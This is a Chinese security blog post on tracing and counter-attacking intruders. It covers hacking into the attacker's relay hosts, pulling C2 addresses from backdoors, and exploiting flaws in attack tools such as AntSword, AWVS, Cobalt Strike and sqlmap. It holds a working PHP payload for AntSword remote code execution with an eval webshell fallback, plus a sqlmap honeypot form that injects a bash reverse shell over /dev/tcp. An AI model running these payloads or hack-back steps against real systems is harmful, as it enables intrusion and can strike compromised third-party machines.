溯源反制思路整合

[TOC]

0x01反制的整体思路

反入侵得到攻击者机器权限 -> 入侵现场还原,摸清入侵思路 -> 并且须知入侵者的相关后门遗留,以便处理后门 -> 抓取入侵者的真实IP获得地理位置 -> 并按照攻击者的攻击路线加固相关漏洞安全。

0x02 反制具体思路

0x0201 反制主机

傀儡机一般都是具有漏洞的主机,可以使用常规渗透测试的手段进行攻击,这个操作就非常广了,在这里不过多赘述。

0x0202 反制后门附件

  1. 对附件进行逆向分析,得到C2地址,然后对目标ip进行渗透攻击。
  2. 有些钓鱼邮件头中,没有对源地址进行伪装,那么就有可能获取到源IP或者域名

https://file.zuopin.cloud/FoMSNPOkQB7bbgRjtkGNSRUZQ2_q

  1. 留下的后门中有对自己的teamserver回传数据,可以通过分析后门,或者查看后门源码得知。

0x0203 反制攻击工具

倘若对方使用带有漏洞版本的攻击工具例如蚁剑、AWVS等,这时候可以使用RCE攻击对其进行反控,高版本蚁剑上此漏洞已经被修复。 已知有漏洞的工具版本:

  1. 蚁剑 <=2.0.7 可以RCE的漏洞 https://github.com/AntSwordProject/antSword/issues/147

    被发现另外一枚可以RCE的漏洞 https://github.com/AntSwordProject/antSword/issues/150

    Payload:

    <?php
    if(strlen($_POST[1]) == 153){
        preg_match_all('/echo "(\\\\w+)";/i', $_POST[1], $mat);
    
        $profix = $mat[1][0];
        $suffix = $mat[1][1];
        echo $profix;?>
        <!DOCTYPE html>
    <html>
      <head>
        <meta charset="UTF-8">
        <title>Hello World!</title>
      </head>
      <body>
        <h1>Hello World!</h1>
        <p>This window does not have access to node bindings.</p>
        <pre>process: <script>document.write(process)</script></pre>
        <script>
          window.open('data:text/html,But this one does! <br><pre>process.cwd(): <script>document.write(process.cwd());const {spawn} = require("child_process");spawn("open",["/Applications/Calculator.app"]);</scr'+'ipt></pre>');
        </script>
      </body>
    </html>
        <?php
        echo $suffix;
    }else{
        eval($_POST[1]);
    }
    
    

    https://images.hacking8.com/2019/04/20/e0xUh_antsword.gif

  2. awvs 10 直接利用exp,等待对方扫描自己,即刻上线。exp下载地址:https://github.com/dzonerzy/acunetix_0day

  3. cobalt strike

    3.5版本teamserver有RCE漏洞

    可以爆破teamserver密码,然后得到黑客攻击的其他傀儡机。

    exp利用地址:https://github.com/ryanohoro/csbruter

  4. sqlmap 构造特殊的get或者post注入点来等待攻击者使用sqlmap扫描,例如下图,将get请求中的一个参数的值设置为lsl,倘若直接改成反弹shell的代码即可反控对方机器。

    https://img-blog.csdnimg.cn/20210309141446725.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3UwMTIyMDY2MTc=,size_16,color_FFFFFF,t_70

    post利用方式:

    
    <html>
    <head>
    <title> A sqlmap honeypot demo</title>
    </head>
    <body>
    <input>search the user</input>
    <form id="myForm" action="username.html" method="post" enctype="text/plain">
    <input type='hidden' name='name'value='Robin&id=4567&command=shell`bash -i >&/dev/tcp/192.168.xxx.xxx/2333 0>&1`&port=1234'/>
    <input type="button"οnclick="myForm.submit()" value="Submit">
    </form>
    </body>
    </html>
    
    

0x03 拿下傀儡机之后如何进行源IP的查找

一般拿到傀儡机之后,就需要查找下一步攻击者的信息了,当然攻击者也很有可能搭建socks代理来攻击,但是还是有可能会发现真实攻击者的蛛丝马迹的。